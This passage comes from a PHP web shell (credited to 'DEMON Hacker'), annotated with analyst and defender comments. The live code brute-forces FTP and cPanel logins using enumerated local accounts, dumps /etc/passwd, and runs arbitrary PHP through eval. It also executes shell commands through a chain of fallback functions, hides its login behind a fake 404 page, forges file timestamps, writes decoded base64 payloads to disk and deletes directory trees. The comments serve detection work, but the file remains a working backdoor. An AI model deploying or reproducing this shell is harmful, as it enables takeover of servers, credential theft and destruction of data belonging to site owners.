1523<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1524
1525<tr>
1526
1527<td align='center'>
1528
1529<b>Username</b></td>
1530
1531<td>
1532
1533<p align='center'>
1534
1535<b>Password</b></td>
1536
1537</tr>
1538
1539</table>
1540
1541<p align='center'>
1542
1543<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1544 $i = 0;
1545 while ($i < 60000) {
1546 $line = posix_getpwuid($i);
1547 if (!empty($line)) {
1548 while (list($key, $vba_etcpwd) = each($line)) {
1549 echo "" . $vba_etcpwd . "\n";
1550 break;
1551 }
1552 }
1553 $i++;
1554 }
1555 echo "
1556
1557</textarea>
1558
1559<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1560
1561<br>
1562
1563<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1564
1565<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1566
1567</td></tr></table></td></tr></form><p align= 'left'>";
1568?>
1569
1570<?php
/*
 * ftp_check: make one FTP login attempt against ftp://$host with the given
 * user/password through curl, and print the pair when curl reports no error.
 *
 *   $host, $user, $pass - target and the single credential pair to try
 *   $timeout            - connect timeout in seconds passed to curl
 *
 * Returns nothing. A connect timeout (curl errno 28) prints an error and ends
 * the whole script via exit, so the remaining pairs are not tried.
 *
 * Defender view: each call is a separate login, so on the FTP server a run would
 * show up as a burst of failed logins from the web host's own address. Login rate
 * limiting or lockout on the FTP service is the relevant control.
 */
1571 function ftp_check($host, $user, $pass, $timeout) {
1572 $ch = curl_init();
1573 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1574 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// NOTE(review): an HTTP auth option on an ftp:// URL; looks copied from cpanel_check.
1575 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1576 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1577 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1578 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1579 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// $data is never read; only the curl error code decides the outcome.
1580 $data = curl_exec($ch);
1581 if (curl_errno($ch) == 28) {
1582 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1583 exit;
1584 } elseif (curl_errno($ch) == 0) {
// errno 0 is treated as a valid login. The message links to port 2082 even though
// the check was made over FTP, and it writes the credentials into the page unescaped.
1585 p("<b>[ Leorius@live.com ]# </b>
1586
1587<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1588 }
1589 curl_close($ch);
1590 }
/*
 * cpanel_check: make one HTTP Basic-auth request to http://$host:2082 with the
 * given user/password and print the pair when curl reports no error.
 *
 *   $host, $user, $pass - target and the single credential pair to try
 *   $timeout            - connect timeout in seconds passed to curl
 *
 * Returns nothing. A connect timeout (curl errno 28) prints an error and ends
 * the whole script via exit.
 *
 * Defender view: the request goes over plain HTTP, so each attempt carries the
 * Basic credentials unencrypted. A run would appear in the panel's access log as
 * many authentication failures from one source in a short window; failed-login
 * lockout and restricting who can reach port 2082 are the relevant controls.
 */
1591 function cpanel_check($host, $user, $pass, $timeout) {
1592 $ch = curl_init();
1593 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1594 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1595 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1596 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1597 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
// With FAILONERROR set, an HTTP error status makes curl report a non-zero error code,
// so the errno test below separates rejected from accepted credentials.
1598 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// $data is never read; only the curl error code decides the outcome.
1599 $data = curl_exec($ch);
1600 if (curl_errno($ch) == 28) {
1601 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1602 exit;
1603 } elseif (curl_errno($ch) == 0) {
1604 p("<b>[ Leorius@live.com ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1605 }
1606 curl_close($ch);
1607 }
// Driver for the two checkers above: runs when the form's submit field is non-empty.
// Users and passwords arrive as newline-separated text and every user is paired with
// every password, so the attempt count is users x passwords against a single $target
// (which defaults to 'localhost' earlier in this branch).
// Defender view: the user textarea is pre-filled from posix_getpwuid() output above, so
// the names tried are real local accounts; set_time_limit(0) earlier in this branch means
// the request can run for a long time, which shows up as a long-lived PHP worker.
1608 if (isset($submit) && !empty($submit)) {
1609 $userlist = explode("\n", $users);
1610 $passlist = explode("\n", $pass);
1611 p('<b>[ Leorius@live.com ]# Attacking ...</font></b><br>');
1612 foreach ($userlist as $user) {
1613 $_user = trim($user);
1614 foreach ($passlist as $password) {
1615 $_pass = trim($password);
// $option comes from the request; any value other than "ftp" or "cpanel" does nothing.
1616 if ($option == "ftp") {
1617 ftp_check($target, $_user, $_pass, $connect_timeout);
1618 }
1619 if ($option == "cpanel") {
1620 cpanel_check($target, $_user, $_pass, $connect_timeout);
1621 }
1622 }
1623 }
1624 }
1625 formfoot();
1626} elseif ($action == 'etcpwd') {
1627 formhead(array('title' => 'Get /etc/passwd'));
1628 makehide('action', 'etcpwd');
1629 makehide('dir', $nowpath);
1630 $i = 0;
1631 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1632 while ($i < 60000) {
1633 $line = posix_getpwuid($i);
1634 if (!empty($line)) {
1635 while (list($key, $vba_etcpwd) = each($line)) {
1636 echo "" . $vba_etcpwd . "\n";
1637 break;
1638 }
1639 }
1640 $i++;
1641 }
1642 echo "</textarea></p>";
1643 formfoot();
1644} elseif ($action == 'eval') {
// Eval handler: $phpcode is never assigned in this branch; it is populated by the loop
// at the top of the file that copies every GET/POST key into a global variable.
// Defender view: eval is a language construct, so the disable_functions setting that the
// file reads at start-up does not block this path. In request logs or WAF data the
// handler is reached with action=eval and a phpcode field in the request.
1645 $phpcode = trim($phpcode);
1646 if ($phpcode) {
// Input without an opening PHP tag is wrapped in open/close tags first.
1647 if (!preg_match('#<\?#si', $phpcode)) {
1648 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1649 }
// The leading close-tag / trailing open-tag pair makes eval treat the submitted text as
// a template, so output and inline HTML go straight into the response.
1650 eval("?" . ">$phpcode<?");
1651 }
1652 formhead(array('title' => 'Eval PHP Code'));
1653 makehide('action', 'eval');
1654 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1655 formfooter();
1656} elseif ($action == 'editfile') {
1657 if (file_exists($opfile)) {
1658 $fp = @fopen($opfile, 'r');
1659 $contents = @fread($fp, filesize($opfile));
1660 @fclose($fp);
1661 $contents = htmlspecialchars($contents);
1662 }
1663 formhead(array('title' => 'Create / Edit File'));
1664 makehide('action', 'file');
1665 makehide('dir', $nowpath);
1666 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1667 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1668 formfooter();
1669} elseif ($action == 'newtime') {
1670 $opfilemtime = @filemtime($opfile);
1671 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1672 formhead(array('title' => 'Clone file was last modified time'));
1673 makehide('action', 'file');
1674 makehide('dir', $nowpath);
1675 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1676 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1677 formfooter();
1678 formhead(array('title' => 'Set last modified'));
1679 makehide('action', 'file');
1680 makehide('dir', $nowpath);
1681 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1682 p('<p>Instead »');
1683 p('year:');
1684 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1685 p('month:');
1686 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1687 p('day:');
1688 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1689 p('hour:');
1690 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1691 p('minute:');
1692 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1693 p('second:');
1694 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1695 p('</p>');
1696 formfooter();
1697} elseif ($action == 'shell') {
1698 if (IS_WIN && IS_COM) {
1699 if ($program && $parameter) {
1700 $shell = new COM('Shell.Application');
1701 $a = $shell->ShellExecute($program, $parameter);
1702 m('Program run has ' . (!$a ? 'success' : 'fail'));
1703 }
1704 !$program && $program = 'c:\windows\system32\cmd.exe';
1705 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1706 formhead(array('title' => 'Execute Program'));
1707 makehide('action', 'shell');
1708 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1709 p('<p>');
1710 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1711 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1712 p('</p>');
1713 formfoot();
1714 }
1715 formhead(array('title' => 'Execute Command'));
1716 makehide('action', 'shell');
1717 if (IS_WIN && IS_COM) {
1718 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1719 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1720 }
1721 p('<p>');
1722 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1723 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1724 p('</p>');
1725 formfoot();
// Command handler: runs the request-supplied $command and prints its output inside <pre>.
// $execfunc (also from the request) selects one of three paths; the first two require
// both IS_WIN and IS_COM, everything else goes to execute(), a helper defined elsewhere.
// Defender view: on the host this appears as cmd.exe or a shell started by the web-server
// process. Disabling the COM extension removes the first two paths; what the fallback can
// still do depends on which functions execute() tries and on disable_functions.
1726 if ($command) {
1727 p('<hr width="100%" noshade /><pre>');
1728 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
// Path 1: WScript.Shell COM object, command passed to "cmd.exe /c".
1729 $wsh = new COM('WScript.shell');
1730 $exec = $wsh->exec('cmd.exe /c ' . $command);
1731 $stdout = $exec->StdOut();
1732 $stroutput = $stdout->ReadAll();
1733 echo $stroutput;
1734 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
// Path 2: start the interpreter named by COMSPEC and feed the command on its stdin,
// followed by "exit"; stdout is drained first, then stderr.
1735 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1736 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1737 if (is_resource($process)) {
1738 fwrite($pipes[0], $command . "\r\n");
1739 fwrite($pipes[0], "exit\r\n");
1740 fclose($pipes[0]);
1741 while (!feof($pipes[1])) {
1742 echo fgets($pipes[1], 1024);
1743 }
1744 fclose($pipes[1]);
1745 while (!feof($pipes[2])) {
1746 echo fgets($pipes[2], 1024);
1747 }
1748 fclose($pipes[2]);
1749 proc_close($process);
1750 }
1751 } else {
// Path 3: fallback used on every non-Windows host and whenever COM is unavailable.
1752 echo (execute($command));
1753 }
1754 p('</pre>');
1755 }
1756} elseif ($action == 'phpenv') {
1757 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1758 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1759 !$dis_func && $dis_func = 'No';
1760 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1761 if ($phpvarname) {
1762 m($phpvarname . ' : ' . getcfg($phpvarname));
1763 }
1764 formhead(array('title' => 'Server environment'));
1765 makehide('action', 'phpenv');
1766 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1767 formfooter();
1768 $hp = array(0 => 'Server', 1 => 'PHP');
1769 for ($a = 0;$a < 2;$a++) {
1770 p('<h2>' . $hp[$a] . ' »</h2>');
1771 p('<ul class="info">');
1772 if ($a == 0) {
1773 for ($i = 1;$i <= 9;$i++) {
1774 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1775 }
1776 } elseif ($a == 1) {
1777 for ($i = 10;$i <= 23;$i++) {
1778 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1779 }
1780 }
1781 p('</ul>');
1782 }
1783} else {
1784 m('Undefined Action');
1785}
1786?>
1787
1788</td></tr></table>
1789
1790<div style="padding:10px;">
1791
1792 <span style="float:right;"><?php debuginfo();
1793ob_end_flush(); ?></span>
1794
1795 Copyright (C) 2013 - Develop by <a herf="http://google.com">DEMON Hacker</a> - ANONYMOUS - Team - Vietnamese Hackers World
1796
1797</div>
1798
1799</body>
1800
1801</html>
1802
1803
1804
1805<?php
1806/*======================================================
1807
1808Show info shell
1809
1810======================================================*/
/**
 * Print a status message inside a green banner <div>.
 *
 * $msg is written exactly as given, with no HTML escaping. Callers in this file
 * pass database error text and strings containing request values, so whatever
 * markup those contain is rendered by the browser.
 */
function m($msg) {
    $open = '<div style="background:#00b000;border:1px solid #006700;padding:15px;font:14px;color:#ffffff;text-align:center;font-weight:bold;">';
    echo $open, $msg, '</div>';
}
/**
 * Set a cookie using the settings in the global $admin array.
 *
 * $key    - cookie name; $admin['cookiepre'] is prepended unless $prefix is falsy
 * $value  - cookie value, stored as given
 * $life   - lifetime in seconds relative to $timestamp; 0 selects
 *           $admin['cookielife'], a negative value expires the cookie
 * $prefix - whether to apply the name prefix
 *
 * The Secure flag is set only when the server port is 443 and no HttpOnly
 * argument is passed. The login code earlier in the file calls this with the
 * name 'vbapass' and the submitted password as the value, so that cookie name
 * is a usable indicator in proxy or web-server logs that record cookies.
 */
function scookie($key, $value, $life = 0, $prefix = 1) {
    global $admin, $timestamp;

    $namePrefix = '';
    if ($prefix) {
        $namePrefix = $admin['cookiepre'];
    }
    $key = $namePrefix . $key;

    if (!$life) {
        $life = $admin['cookielife'];
    }

    $secure = 0;
    if ($_SERVER['SERVER_PORT'] == 443) {
        $secure = 1;
    }

    $expires = $timestamp + $life;
    setcookie($key, $value, $expires, $admin['cookiepath'], $admin['cookiedomain'], $secure);
}
/**
 * Build the HTML pager ("First / Prev / [n] / Next / Last") for a table listing.
 *
 * Every link is a javascript: URL that calls settable(tablename, '', page).
 * $tablename is concatenated into that script string without escaping.
 *
 * @param int    $num       Total number of rows.
 * @param int    $perpage   Rows per page.
 * @param int    $curpage   Current page number (1-based, judging by the $from < 1 check).
 * @param string $tablename Table name passed through to settable().
 * @return string Pager markup wrapped in <p>, or '' when everything fits on one page.
 */
function multi($num, $perpage, $curpage, $tablename) {
    $multipage = '';
    if ($num > $perpage) {
        // At most $page page links are shown, with $offset of them before the current page.
        $page = 10;
        $offset = 5;
        $pages = @ceil($num / $perpage);
        if ($page > $pages) {
            // Fewer pages than the window: show them all.
            $from = 1;
            $to = $pages;
        } else {
            $from = $curpage - $offset;
            $to = $curpage + $page - $offset - 1;
            if ($from < 1) {
                // Window ran off the left edge: clamp to page 1.
                $to = $curpage + 1 - $from;
                $from = 1;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $to = $page;
                }
            } elseif ($to > $pages) {
                // Window ran off the right edge: clamp to the last page.
                $from = $curpage - $pages + $to;
                $to = $pages;
                if (($to - $from) < $page && ($to - $from) < $pages) {
                    $from = $pages - $page + 1;
                }
            }
        }
        $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
        for ($i = $from;$i <= $to;$i++) {
            // The current page is printed as plain text, the others as links.
            $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
        }
        $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
        $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
    }
    return $multipage;
}
/**
 * Print the password prompt and end the request.
 *
 * Analyst notes:
 *  - The markup imitates an Apache "404 Not Found" error document. The only
 *    functional element is a password field styled white-on-white plus a
 *    hidden field doing=login, posted back to the same URL.
 *  - No HTTP status header is set in this function, so unless a caller sets
 *    one the response would carry a success status with a "404" body. That
 *    mismatch, and a <form> inside an error page, are useful things to
 *    match on when reviewing web content or proxy logs.
 */
function loginpage() {
?>

<html> <title>404 Not Found</title> <h1>Not Found</h1> <p>The requested URL / was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache Server at Port 80</address> <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style> <center> <form method="POST" action=""> <span style="font:10pt tahoma;"></span><input name="password" type="password" size="20"> <input type="hidden" name="doing" value="login"> </form> </center> </html>




<?php
    // Terminate so nothing else of the page is produced after the prompt.
    exit;
}
/**
 * Run an operating-system command line and return whatever it printed.
 *
 * The first available mechanism wins, in this order: exec, shell_exec,
 * system, passthru (each gated by function_exists), then popen. Every call
 * is prefixed with @, so failures produce no warning.
 *
 * Hardening note: because of this fallback chain, blocking only some of
 * these functions does not stop the routine; each of the five is an
 * independent path. Web-server processes spawning a shell is the behaviour
 * to alert on at the host level.
 *
 * @param string $cfe Command line, passed to the shell unchanged.
 * @return string Captured output, or '' when $cfe is empty or nothing ran.
 */
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            // exec() fills $res with an array of output lines.
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            // system() prints directly, so capture it with an output buffer.
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            // Last resort: read the pipe in 1 KiB chunks until EOF.
            $res = '';
            while (!@feof($f)) {
                $res.= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
/**
 * Resolve a program name to a path by running the shell's `which`.
 *
 * NOTE(review): $pr is interpolated into the command line without
 * escapeshellarg(), so its content is interpreted by the shell.
 *
 * @param string $pr Program name.
 * @return string Output of `which`, or $pr itself when that output is empty.
 */
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
/**
 * Write a base64-encoded payload to disk.
 *
 * The file is opened in 'w' mode (created or truncated) and receives the
 * decoded bytes. All three calls are silenced with @ and nothing is
 * returned, so a failed write is invisible to the caller.
 *
 * Analyst note: a source file carrying base64 blobs that are decoded and
 * written to disk is a pattern worth flagging during code or upload review.
 *
 * @param string $fname Destination path.
 * @param string $text  Base64-encoded content.
 */
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, base64_decode($text));
        @fclose($fp);
    }
}
/**
 * Print how long the request has been running.
 *
 * Elapsed time is the current microtime minus the global $starttime,
 * formatted with six decimals.
 */
function debuginfo() {
    global $starttime;
    // microtime() returns "usec sec" as a space-separated string.
    list($usec, $sec) = explode(' ', microtime());
    $elapsed = $sec + $usec - $starttime;
    echo 'Processed in ' . number_format($elapsed, 6) . ' second(s)';
}
/**
 * Open a MySQL connection with the legacy mysql_* extension and optionally
 * select a database and set the connection character set.
 *
 * On a failed connect or a failed database selection the function prints an
 * <h2> message and ends the request with exit.
 *
 * NOTE(review): the mysql_* functions were removed in PHP 7, so this code
 * only runs on PHP 5.x or with a compatibility shim.
 *
 * @param string $dbhost  Host name or address.
 * @param string $dbuser  User name.
 * @param string $dbpass  Password.
 * @param string $dbname  Database to select; skipped when empty.
 * @param string $charset Applied only when it is one of gbk, big5, utf8.
 * @param string $dbport  TCP port appended to the host as "host:port".
 * @return resource Link identifier returned by mysql_connect().
 */
function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
    if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
        p('<h2>Can not connect to MySQL server</h2>');
        exit;
    }
    if ($link && $dbname) {
        if (!@mysql_select_db($dbname, $link)) {
            p('<h2>Database selected has error</h2>');
            exit;
        }
    }
    // NOTE(review): the version check compares two strings with >, not version_compare().
    if ($link && mysql_get_server_info() > '4.1') {
        // $charset reaches the SQL text only after matching this fixed list.
        if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
            // q() as defined in this file takes one parameter; the $link argument is ignored.
            q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
        }
    }
    return $link;
}
/**
 * Recursively remove backslash escaping from a value.
 *
 * Strings go through stripslashes(); arrays are walked element by element;
 * any other type is returned untouched. The argument is taken by reference
 * and is modified in place as well as returned.
 *
 * @param mixed $array String, array (possibly nested) or other value.
 * @return mixed The unescaped value.
 */
function s_array(&$array) {
    if (is_string($array)) {
        $array = stripslashes($array);
        return $array;
    }
    if (is_array($array)) {
        foreach (array_keys($array) as $idx) {
            $array[$idx] = s_array($array[$idx]);
        }
    }
    return $array;
}
/**
 * Prepare text for display inside HTML.
 *
 * htmlspecialchars() is called with its default flags, then newlines become
 * <br /> tags.
 *
 * NOTE(review): in this copy of the file the two whitespace replacements
 * below look like they swap a space for a space and a tab for a space.
 * The original presumably replaced them with HTML entities that the paste
 * rendering decoded. TODO confirm against a raw copy.
 *
 * @param string $content Raw text.
 * @return string Escaped text with line breaks converted.
 */
function html_clean($content) {
    $content = htmlspecialchars($content);
    $content = str_replace("\n", "<br />", $content);
    $content = str_replace(" ", " ", $content);
    $content = str_replace("\t", " ", $content);
    return $content;
}
/**
 * Return a path's permission bits as a four-digit octal string (e.g. "0644").
 *
 * @param string $filepath Path to inspect.
 * @return string Last four octal digits of the mode reported by fileperms().
 */
function getChmod($filepath) {
    $mode = @fileperms($filepath);
    $octal = base_convert($mode, 10, 8);
    // Keep only the permission digits; the leading digits encode the file type.
    return substr($octal, -4);
}
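/**
 * Render a path's mode as an `ls -l` style string such as "drwxr-xr-x".
 *
 * The file type is decided from the whole type field of the mode. The
 * earlier bit-by-bit chain tested the directory bit (0x4000) before the
 * block-device value (0x6000), so block devices were reported as 'd' and
 * the 'b' branch could never be reached.
 *
 * @param string $filepath Path to inspect.
 * @return string Ten characters: type, then rwx triplets for owner, group
 *                and others (with s/S/t/T for setuid, setgid and sticky).
 *                A path that cannot be read yields "?---------".
 */
function getPerms($filepath) {
    $mode = @fileperms($filepath);

    // Compare the complete type field so overlapping bit patterns cannot shadow each other.
    switch ($mode & 0xF000) {
        case 0xC000:
            $type = 's';
            break;
        case 0xA000:
            $type = 'l';
            break;
        case 0x8000:
            $type = '-';
            break;
        case 0x6000:
            $type = 'b';
            break;
        case 0x4000:
            $type = 'd';
            break;
        case 0x2000:
            $type = 'c';
            break;
        case 0x1000:
            $type = 'p';
            break;
        default:
            $type = '?';
    }

    $owner = array(
        'read' => ($mode & 0400) ? 'r' : '-',
        'write' => ($mode & 0200) ? 'w' : '-',
        'execute' => ($mode & 0100) ? 'x' : '-',
    );
    $group = array(
        'read' => ($mode & 0040) ? 'r' : '-',
        'write' => ($mode & 0020) ? 'w' : '-',
        'execute' => ($mode & 0010) ? 'x' : '-',
    );
    $world = array(
        'read' => ($mode & 0004) ? 'r' : '-',
        'write' => ($mode & 0002) ? 'w' : '-',
        'execute' => ($mode & 0001) ? 'x' : '-',
    );

    // setuid, setgid and sticky replace the execute column; lower case means execute is also set.
    if ($mode & 0x800) {
        $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    }
    if ($mode & 0x400) {
        $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    }
    if ($mode & 0x200) {
        $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
    }

    return $type . implode('', $owner) . implode('', $group) . implode('', $world);
}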
/**
 * Return an HTML link naming the owner of a path, with the owner's full
 * passwd entry in the link's title attribute.
 *
 * Analyst note: the tooltip carries every field posix_getpwuid() returns
 * (name, passwd, uid, gid, gecos, home directory, login shell), i.e. this
 * helper is an account-enumeration aid. The values are placed into the
 * attribute without HTML escaping.
 *
 * @param string $filepath Path whose owner is looked up.
 * @return string ' / <a ...>name</a>' or '' when POSIX functions are
 *                unavailable or the lookup fails.
 */
function getUser($filepath) {
    if (function_exists('posix_getpwuid')) {
        $array = @posix_getpwuid(@fileowner($filepath));
        if ($array && is_array($array)) {
            // The string literals below contain real line breaks, which become the tooltip's lines.
            return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
        }
    }
    return '';
}
/**
 * Recursively delete a directory and everything in it.
 *
 * Each entry is first made world-writable (chmod 0777) and then removed;
 * sub-directories are handled by recursion. Errors are silenced with @.
 *
 * NOTE(review): dir() is called with @ and its result is used without a
 * check, so an unreadable directory leads to a method call on false. The
 * loop condition also stops at the first entry whose name is falsy (for
 * example a file called "0").
 *
 * @param string $deldir Directory to remove.
 * @return int 1 when the final rmdir() succeeded, otherwise 0.
 */
function deltree($deldir) {
    $mydir = @dir($deldir);
    while ($file = $mydir->read()) {
        if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
            @chmod($deldir . '/' . $file, 0777);
            deltree($deldir . '/' . $file);
        }
        if (is_file($deldir . '/' . $file)) {
            @chmod($deldir . '/' . $file, 0777);
            @unlink($deldir . '/' . $file);
        }
    }
    $mydir->close();
    @chmod($deldir, 0777);
    return @rmdir($deldir) ? 1 : 0;
}
/**
 * Return alternating CSS class names for table rows.
 *
 * Uses and increments the global counter $bgc: even values give 'alt1',
 * odd values give 'alt2'.
 *
 * @return string 'alt1' or 'alt2'.
 */
function bg() {
    global $bgc;
    $isEvenRow = ($bgc % 2 == 0);
    $bgc++;
    if ($isEvenRow) {
        return 'alt1';
    }
    return 'alt2';
}
/**
 * Normalise a directory path: forward slashes only, doubled slashes
 * collapsed once, and a trailing slash guaranteed.
 *
 * @param string $scriptpath Path used when $nowpath is '.'.
 * @param string $nowpath    Requested path.
 * @return string Normalised path ending in '/'.
 */
function getPath($scriptpath, $nowpath) {
    $path = ($nowpath == '.') ? $scriptpath : $nowpath;
    // The array form applies the replacements in order: backslashes first, then '//'.
    $path = str_replace(array('\\', '//'), '/', $path);
    return (substr($path, -1) == '/') ? $path : $path . '/';
}
/**
 * Return the parent directory of a slash-terminated path.
 *
 * The path is split on '/'; when there are more than two segments the last
 * two (the final directory name and the empty piece after the trailing
 * slash) are dropped.
 *
 * @param string $nowpath Path ending in '/'.
 * @return string Parent path ending in '/'.
 */
function getUpPath($nowpath) {
    $segments = explode('/', $nowpath);
    $count = count($segments);
    if ($count > 2) {
        $segments = array_slice($segments, 0, $count - 2);
    }
    return str_replace('//', '/', implode('/', $segments) . '/');
}
/**
